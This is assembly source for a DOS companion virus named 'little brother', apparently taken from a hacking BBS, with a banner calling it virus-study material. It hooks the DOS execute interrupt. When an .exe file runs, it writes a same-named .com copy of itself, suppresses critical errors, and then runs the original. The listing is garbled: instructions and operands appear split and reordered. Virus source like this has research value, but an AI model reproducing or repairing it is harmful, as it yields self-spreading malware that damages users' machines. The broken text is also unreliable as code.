;****************************************************************************; ; ; ; -=][][][][][][][][][][][][][][][=; ; -=] p e r f e c t c r i m e [=; ; -=] +31.(o)79.426o79 [=; ; -=] [=; ; -=] for all your h/p/a/v files [=; ; -=] sysop: peter venkman [=; ; -=] [=; ; -=] +31.(o)79.426o79 [=; ; -=] p e r f e c t c r i m e [=; ; -=][][][][][][][][][][][][][][][=; ; ; ; *** not for general distribution *** ; ; ; ; this file is for the purpose of virus study only! it should not be passed ; ; around among the general public. it will be very useful for learning how ; ; viruses work and propagate. but anybody with access to an assembler can ; ; turn it into a working virus and anybody with a bit of assembly coding ; ; experience can turn it into a far more malevolent program than it already ; ; is. keep this code in responsible hands! ; ; ; ;****************************************************************************; ;**************************************************************************** ;* little brother version 2 ;* ;* compile with masm 4.0 ;* (other assemblers will probably not produce the same result) ;* ;* disclaimer: ;* this file is only for educational purposes. the author takes no ;* responsibility for anything anyone does with this file. do not ;* modify this file! ;**************************************************************************** cseg
filelen respar version_ oi21 nameptr dta
segment assume cs:cseg,ds:cseg,es:nothing .radix
16
equ equ equ equ equ equ
end_ - begin (filelen/16d) + 17d 2 end_ end_+4 end_+8
;**************************************************************************** ;* install the program! ;**************************************************************************** org begin:
100h
cld mov mov
ax,0044h es,ax
;move program to empty hole
rep
cancel:
mov mov mov movsb
di,0100h si,di cx,filelen
mov mov mov mov lodsw cmp je stosw movsw
ds,cx si,0084h di,offset oi21 dx,offset ni21
;get original int21 vector
ax,dx cancel
;already installed?
push pop mov int
es ds ax,2521h 21h
;set vector to new handler
ret
;**************************************************************************** ;* file-extensions ;**************************************************************************** exe_txt com_txt
db db
'exe',0 'com',0
;**************************************************************************** ;* interrupt handler 24 ;**************************************************************************** ni24:
mov iret
al,03
;**************************************************************************** ;* interrupt handler 21 ;**************************************************************************** ni21:
pushf push push push push push
dx bx ax ds es
cmp jne
ax,4b00h exit
doit:
call
infect
exit:
pop pop pop
es ds ax
;execute ?
pop pop popf
bx dx
jmp
dword ptr cs:[oi21]
;call to old int-handler
;**************************************************************************** ;* tries to infect the file (ptr to asciiz-name is ds:dx) ;**************************************************************************** infect:
cld
rep
rep do_exe:
mov mov
word ptr cs:[nameptr],dx ;save the ptr to the filename word ptr cs:[nameptr+2],ds
mov int push push
ah,2fh 21 es bx
;get old dta
push pop mov mov int
cs ds dx,offset dta ah,1ah 21
;set new dta
call push mov mov cmpsb pop jz
searchpoint di si,offset com_txt cx,3
mov mov cmpsb jnz
si,offset exe_txt cl,3
mov call
si,offset com_txt change_ext
;change extension to com
mov int push
ax,3300h 21 dx
;get ctrl-break flag
cwd inc push int
ax ax 21
mov int push push
ax,3524h 21 bx es
;get int24 vector
push
cs
;set int24 vec to new handler
;is extension 'com'?
di do_com ;is extension 'exe'?
return
;clear the flag
return1:
return:
pop mov mov push int
ds dx,offset ni24 ah,25h ax 21
lds xor mov int jc xchg
dx,dword ptr [nameptr] cx,cx ah,5bh 21 return1 bx,ax
push pop mov mov mov int cmp pushf
cs ds cx,filelen dx,offset begin ah,40h 21 ax,cx
mov int
ah,3eh 21
;close the file
popf jz
return1
;all bytes written?
lds mov int
dx,dword ptr [nameptr] ah,41h 21
;no, delete the virus
pop pop pop int
ax ds dx 21
;restore int24 vector
pop pop int
ax dx 21
;restore ctrl-break flag
mov call
si,offset exe_txt change_ext
;change extension to exe ;execute exe-file
mov pop pop int
ah,1ah dx ds 21
;restore old dta
;create the virus (unique name)
;save handle
;write the virus
ret do_com:
call cmp jne mov call call jnc
findfirst ;is the com-file a virus? word ptr cs:[dta+1ah],filelen return ;no, execute com-file si,offset exe_txt ;does the exe-variant exist? change_ext findfirst return ;yes, execute exe-file
mov call jmp
si,offset com_txt change_ext short return
;change extension to com ;execute com-file
;**************************************************************************** ;* find the file ;**************************************************************************** findfirst:
lds mov mov int ret
dx,dword ptr [nameptr] cl,27h ah,4eh 21
;**************************************************************************** ;* change the extension of the filename (cs:si -> ext) ;**************************************************************************** change_ext:
call push pop movsw movsw ret
searchpoint cs ds
;**************************************************************************** ;* search begin of extension ;**************************************************************************** searchpoint: repnz
les mov mov scasb sub ret
di,dword ptr cs:[nameptr] ch,0ffh al,0 di,4
;**************************************************************************** ;* text and signature ;**************************************************************************** db
'little brother',0
ends end
begin
end_: cseg
;****************************************************************************; ; ; ; -=][][][][][][][][][][][][][][][=; ; -=] p e r f e c t c r i m e [=; ; -=] +31.(o)79.426o79 [=; ; -=] [=; ; -=] for all your h/p/a/v files [=;
; -=] sysop: peter venkman [=; ; -=] [=; ; -=] +31.(o)79.426o79 [=; ; -=] p e r f e c t c r i m e [=; ; -=][][][][][][][][][][][][][][][=; ; ; ; *** not for general distribution *** ; ; ; ; this file is for the purpose of virus study only! it should not be passed ; ; around among the general public. it will be very useful for learning how ; ; viruses work and propagate. but anybody with access to an assembler can ; ; turn it into a working virus and anybody with a bit of assembly coding ; ; experience can turn it into a far more malevolent program than it already ; ; is. keep this code in responsible hands! ; ; ; ;****************************************************************************;